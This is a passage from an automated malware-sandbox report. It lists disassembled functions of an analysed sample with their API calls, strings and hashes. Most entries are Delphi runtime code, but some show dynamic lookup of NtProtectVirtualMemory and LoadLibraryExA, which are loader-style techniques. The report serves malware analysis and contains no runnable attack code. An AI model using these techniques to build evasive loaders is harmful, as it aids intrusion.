                                                                              • Instruction Fuzzy Hash: 13318671E4021C3AFF25EAB8DC85FEF77AD5B44380F4A41E19608E6185DB749E888F91
                                                                              Function 029979D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22librarynativeloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 029979E5
                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 029979EB
                                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 02997A09
                                                                              Strings
                                                                              • NtProtectVirtualMemory, xrefs: 029979DB
                                                                              • C:\Windows\System32\ntdll.dll, xrefs: 029979E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleMemoryModuleProcProtectVirtual
                                                                              • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                                              • API String ID: 1550029230-1386159242
                                                                              • Opcode ID: df666a2a35c0016945302da9f3bbfac7f695765a557096eaa1ae750a9f89f02c
                                                                              • Instruction ID: 8e020f7c3fe391f04980fe017804de512ca5a26c11f95137509acf9c857f0232
                                                                              • Opcode Fuzzy Hash: df666a2a35c0016945302da9f3bbfac7f695765a557096eaa1ae750a9f89f02c
                                                                              • Instruction Fuzzy Hash: EDE0B6B6691208AF9B40EEDCEC45DDBB7ECAB58220B004801BE19DB200C630E9619FB4
                                                                              Function 02987F62 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02987F85
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DiskFreeSpace
                                                                              • String ID:
                                                                              • API String ID: 1705453755-0
                                                                              • Opcode ID: 8665c927c96c32c4f1226cbe601850ed587083270b8ad2943d0e18c1f55c7465
                                                                              • Instruction ID: a92c616a1875227a1be378ab0bede5874df8a281a62ed84173704fa371d341f7
                                                                              • Opcode Fuzzy Hash: 8665c927c96c32c4f1226cbe601850ed587083270b8ad2943d0e18c1f55c7465
                                                                              • Instruction Fuzzy Hash: 2B11C0B5A00209AFDB04DF99C8819AFF7F9EFC8704B14C569A515EB254E6719A018B90
                                                                              Function 0298A754 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0298A772
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: fd44b84397e343e6ab0a03f6b01e748795d4be2baad4aacefe5b0ce7905c0c2f
                                                                              • Instruction ID: c6a59d6b3e1aee38729971fa6ed4c2c1613e3aa9798d99d7b5bd723d5b38a329
                                                                              • Opcode Fuzzy Hash: fd44b84397e343e6ab0a03f6b01e748795d4be2baad4aacefe5b0ce7905c0c2f
                                                                              • Instruction Fuzzy Hash: B8E0D835B0021417D711B5689C80AFA739D9B9C310F08427FBD09C7340FDA09D444AE8
                                                                              Function 0298B71C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetVersionExA.KERNEL32(?,029AA106,00000000,029AA11E), ref: 0298B72A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Version
                                                                              • String ID:
                                                                              • API String ID: 1889659487-0
                                                                              • Opcode ID: 7cfe5c6d4333f3a438200bae834ca6818d8ae3774282adc9cf38efa2ac163ece
                                                                              • Instruction ID: 39efe9f5eedddd2232ab406856d0a4d2ca31e90da684cb2c81f01bb9648cb186
                                                                              • Opcode Fuzzy Hash: 7cfe5c6d4333f3a438200bae834ca6818d8ae3774282adc9cf38efa2ac163ece
                                                                              • Instruction Fuzzy Hash: 93F0B7749483019FC350EF28D56062577E5FF9A758F08492DE899C7B80D77498148FD6
                                                                              Function 0298A7A0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0298BE02,00000000,0298C01B,?,?,00000000,00000000), ref: 0298A7B3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                              • Instruction ID: 16c484f28786049d8d01741f58f35c0022c7df526ee1f4b38650070e68a251ac
                                                                              • Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                              • Instruction Fuzzy Hash: 5DD05E6630E2A02AA320A15A2D84D7B5AECCBC5BA1F08483EB588CA240D2048C06A6B1
                                                                              Function 0298919C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LocalTime
                                                                              • String ID:
                                                                              • API String ID: 481472006-0
                                                                              • Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                              • Instruction ID: 8973fb8f9f40c206c315462732d764627234d3418b2e0c3d9af411d7357c1b34
                                                                              • Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                              • Instruction Fuzzy Hash: 23A011008088200282803B280C0223A3088A880A20FC80B80A8F8883E0EA2E022080E3
                                                                              Function 029820C4 Relevance: .1, Instructions: 94COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                              • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                              • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                              • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                              Function 029DF3AD Relevance: .0, Instructions: 33COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.00000000029DF000.00000040.00001000.00020000.00000000.sdmp, Offset: 029DF000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_29df000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
                                                                              • Instruction ID: e214295b515d9b4b4d7bf215d238bbaac53a4cb834b1bc75c2fdc2e4fcfd3c41
                                                                              • Opcode Fuzzy Hash: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
                                                                              • Instruction Fuzzy Hash: 91F058322142518FD621CE59C8C2B59F3ACEF407E8F2B89AAE54297951C328E844EA50
                                                                              Function 0298D224 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0298D22D
                                                                                • Part of subcall function 0298D1F8: GetProcAddress.KERNEL32(00000000), ref: 0298D211
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                              • API String ID: 1646373207-1918263038
                                                                              • Opcode ID: 2ad6428e7c5be5ae6e04227af8369b988aa5758e82b15ae6fe3cb92496691988
                                                                              • Instruction ID: 5f73a661439f9bb570ac234ed9b3ea68444e9db1c90760d17da6bd73a9b3536a
                                                                              • Opcode Fuzzy Hash: 2ad6428e7c5be5ae6e04227af8369b988aa5758e82b15ae6fe3cb92496691988
                                                                              • Instruction Fuzzy Hash: 5F418DA2A893485B920C7BBD7400977B7DEDB887643A8441BF518CB7C4EE30BC915B79
                                                                              Function 02996E68 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02996E6E
                                                                              • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02996E7F
                                                                              • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02996E8F
                                                                              • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02996E9F
                                                                              • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02996EAF
                                                                              • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02996EBF
                                                                              • GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 02996ECF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                              • API String ID: 667068680-2233174745
                                                                              • Opcode ID: dc4624901f175c45985a31e8c27799ca8072e5687d6f0b5837eeef57ce970938
                                                                              • Instruction ID: e28ec3705321674ff199e107be358aa65ae361a3486713f58af2cbf7d644175b
                                                                              • Opcode Fuzzy Hash: dc4624901f175c45985a31e8c27799ca8072e5687d6f0b5837eeef57ce970938
                                                                              • Instruction Fuzzy Hash: CFF057F1A8D345AEB7007F789CAED372BDD9DE0718714182D74175D542DA75C8204FA0
                                                                              Function 0299A3BC Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 0299A3DC
                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 0299A3F3
                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 0299A3F9
                                                                              • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 0299A40B
                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 0299A487
                                                                              • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 0299A493
                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 0299A4A7
                                                                              Strings
                                                                              • LoadLibraryExA, xrefs: 0299A3E9
                                                                              • C:\Windows\System32\KernelBase.dll, xrefs: 0299A3EE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Read$AddressHandleLibraryLoadModuleProc
                                                                              • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                              • API String ID: 2083169754-1650066521
                                                                              • Opcode ID: 7af8ea7c186e0c9ba372a8bd72242afb008df6f4e0c1456a4f19371e26a2d0b3
                                                                              • Instruction ID: 74249c343a8660f0a1e75262a3383b0a5646ca4d6f9bddac1834bdc16966bac7
                                                                              • Opcode Fuzzy Hash: 7af8ea7c186e0c9ba372a8bd72242afb008df6f4e0c1456a4f19371e26a2d0b3
                                                                              • Instruction Fuzzy Hash: 97313071640205BBEF20DBACCC89F9A77ACEF45378F044554FA189A281D774E950CBA0
                                                                              Function 02982530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 029828CE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message
                                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                              • API String ID: 2030045667-32948583
                                                                              • Opcode ID: 590b1cdf0ec9de8856d1c1c6d3cc77d6f3f5087edd0877b94d2d1d3fb3dec49b
                                                                              • Instruction ID: 314c450f3b8f66780af3b8b00c9e47fb84a5a0c5c1ead0360d416b9611850049
                                                                              • Opcode Fuzzy Hash: 590b1cdf0ec9de8856d1c1c6d3cc77d6f3f5087edd0877b94d2d1d3fb3dec49b
                                                                              • Instruction Fuzzy Hash: 1AA1E230E043D48BDF21BB2CCC84BA9B7E9EB49750F1840E5ED49AB285CB759985CF51
                                                                              Function 0298252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • , xrefs: 02982814
                                                                              • bytes: , xrefs: 0298275D
                                                                              • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02982849
                                                                              • 7, xrefs: 029826A1
                                                                              • An unexpected memory leak has occurred. , xrefs: 02982690
                                                                              • Unexpected Memory Leak, xrefs: 029828C0
                                                                              • The unexpected small block leaks are:, xrefs: 02982707
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                              • API String ID: 0-2723507874
                                                                              • Opcode ID: 90b6c6532f30d6a39d04c430102b93ee9d887efb665175bcc2cf358a7b9e452e
                                                                              • Instruction ID: 0719739583c20c77d89cfe1024729d12946264d4cb7b41e38e29b87f5c79e632
                                                                              • Opcode Fuzzy Hash: 90b6c6532f30d6a39d04c430102b93ee9d887efb665175bcc2cf358a7b9e452e
                                                                              • Instruction Fuzzy Hash: DD71B130E042D88FDF21BB2CCC84B99BAE9EB49744F1841E5D949EB281DB758AC5CF51
                                                                              Function 0298BD50 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetThreadLocale.KERNEL32(00000000,0298C01B,?,?,00000000,00000000), ref: 0298BD86
                                                                                • Part of subcall function 0298A754: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0298A772
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Locale$InfoThread
                                                                              • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                              • API String ID: 4232894706-2493093252
                                                                              • Opcode ID: af95555152fb78c3cb4884559c3c92ac49dbe66c9a4b767c580a60c01974975b
                                                                              • Instruction ID: 7b8d9f6730723f9727ea27048b3447999fda48e8fcae1dc179305f64893a7e52
                                                                              • Opcode Fuzzy Hash: af95555152fb78c3cb4884559c3c92ac49dbe66c9a4b767c580a60c01974975b
                                                                              • Instruction Fuzzy Hash: 2461FE34A402499BDB04FBA4EC90A9F77FBAFC8340F589436E101DB645DA39D9099F61
                                                                              Function 0298432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029843F3,?,?,029D67C8,?,?,029AB7A8,0298655D,029AA30D), ref: 02984365
                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029843F3,?,?,029D67C8,?,?,029AB7A8,0298655D,029AA30D), ref: 0298436B
                                                                              • GetStdHandle.KERNEL32(000000F5,029843B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029843F3,?,?,029D67C8), ref: 02984380
                                                                              • WriteFile.KERNEL32(00000000,000000F5,029843B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029843F3,?,?), ref: 02984386
                                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 029843A4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileHandleWrite$Message
                                                                              • String ID: Error$Runtime error at 00000000
                                                                              • API String ID: 1570097196-2970929446
                                                                              • Opcode ID: 467fcb3eb9fe32be3874b210ba093bf1315ed377e147b3b9397fe51ad3e70ae7
                                                                              • Instruction ID: a7d3a985527ef10fe821dc78c2533274d9721248df201e660fb11acdc7a3f481
                                                                              • Opcode Fuzzy Hash: 467fcb3eb9fe32be3874b210ba093bf1315ed377e147b3b9397fe51ad3e70ae7
                                                                              • Instruction Fuzzy Hash: 1AF0BE60AC93447AFB10B2A0AD5AF79275C5BC4F29F5C6B06B328A90C4C7F450C5AB66
                                                                              Function 02997B5C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 60libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(KernelBase,00000000,02997C60,00000000,00000000,00000000,00000000,00000000,oces,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02997BDE
                                                                              • GetProcAddress.KERNEL32(00000000,KernelBase), ref: 02997BE4
                                                                              • GetCurrentProcess.KERNELBASE ref: 02997BEE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressCurrentHandleModuleProcProcess
                                                                              • String ID: GetCurre$KernelBase$oces
                                                                              • API String ID: 4190356694-953896676
                                                                              • Opcode ID: b08b26361a193265d50b6109171affbb193b91add1a66c1d71cf0cc422a18fa7
                                                                              • Instruction ID: 7b75c6a2a4013d49f071236fff96aecea53dded70f085d716845c3c56bc6adfa
                                                                              • Opcode Fuzzy Hash: b08b26361a193265d50b6109171affbb193b91add1a66c1d71cf0cc422a18fa7
                                                                              • Instruction Fuzzy Hash: CEF081B07943047BFF14BBE49D42FEAF799DBC4F20F610460B501A6780E9B4A940D925
                                                                              Function 0298AE54 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0298ACCC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0298ACE9
                                                                                • Part of subcall function 0298ACCC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0298AD0D
                                                                                • Part of subcall function 0298ACCC: GetModuleFileNameA.KERNEL32(02980000,?,00000105), ref: 0298AD28
                                                                                • Part of subcall function 0298ACCC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0298ADBE
                                                                              • CharToOemA.USER32(?,?), ref: 0298AE8B
                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0298AEA8
                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0298AEAE
                                                                              • GetStdHandle.KERNEL32(000000F4,0298AF18,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0298AEC3
                                                                              • WriteFile.KERNEL32(00000000,000000F4,0298AF18,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0298AEC9
                                                                              • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0298AEEB
                                                                              • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0298AF01
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                              • String ID:
                                                                              • API String ID: 185507032-0
                                                                              • Opcode ID: 17374d4fc6a0d2f64f8c06009b3948c48dbbbfa296de8d9404fb9072641a05de
                                                                              • Instruction ID: 11e01244b5108e924ec1f66f4a4fba55fc319f03a4e07f16bf0e061af6d78cb5
                                                                              • Opcode Fuzzy Hash: 17374d4fc6a0d2f64f8c06009b3948c48dbbbfa296de8d9404fb9072641a05de
                                                                              • Instruction Fuzzy Hash: CE115EB25483447ED700FBA4CC85F9B77EDAB84700F48092AB754DA0E1DA74E9448FB6
                                                                              Function 0298E51C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0298E5B5
                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0298E5D1
                                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0298E60A
                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0298E687
                                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0298E6A0
                                                                              • VariantCopy.OLEAUT32(?,00000000), ref: 0298E6D5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                              • String ID:
                                                                              • API String ID: 351091851-0
                                                                              • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                              • Instruction ID: 57829dc171f222bca3a8a1eaf482ddb59bb33c8d0c61b7a4e21e58a9a0a98b8e
                                                                              • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                              • Instruction Fuzzy Hash: B751F975A006299BCB26EF68CC90BD9B3BDAF4C304F0841E5F549E7251DA30AF858F65
                                                                              Function 02983568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0298358A
                                                                              • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029835D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029835BD
                                                                              • RegCloseKey.ADVAPI32(?,029835E0,00000000,?,00000004,00000000,029835D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029835D3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                              • API String ID: 3677997916-4173385793
                                                                              • Opcode ID: 5afcb5105855dd20bfe785c5ac7cd4c82f68320a36d93bba31fe981838970190
                                                                              • Instruction ID: c565cc9c6e766bfcd66804ab4bef41970f90a20c6c66e01d970efa6ea1818cba
                                                                              • Opcode Fuzzy Hash: 5afcb5105855dd20bfe785c5ac7cd4c82f68320a36d93bba31fe981838970190
                                                                              • Instruction Fuzzy Hash: E301B175A44318BAEB11EB908D02BBD77ECEB48B10F1405A6BB04E6580E6749A10DA99
                                                                              Function 02980ABD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41stringlibraryfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,02986BD8,02980000,029AB790), ref: 029858D1
                                                                              • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 029858E8
                                                                              • lstrcpynA.KERNEL32(?,?,?), ref: 02985918
                                                                              • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02986BD8,02980000,029AB790), ref: 0298597C
                                                                              • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000,029AB790), ref: 029859B2
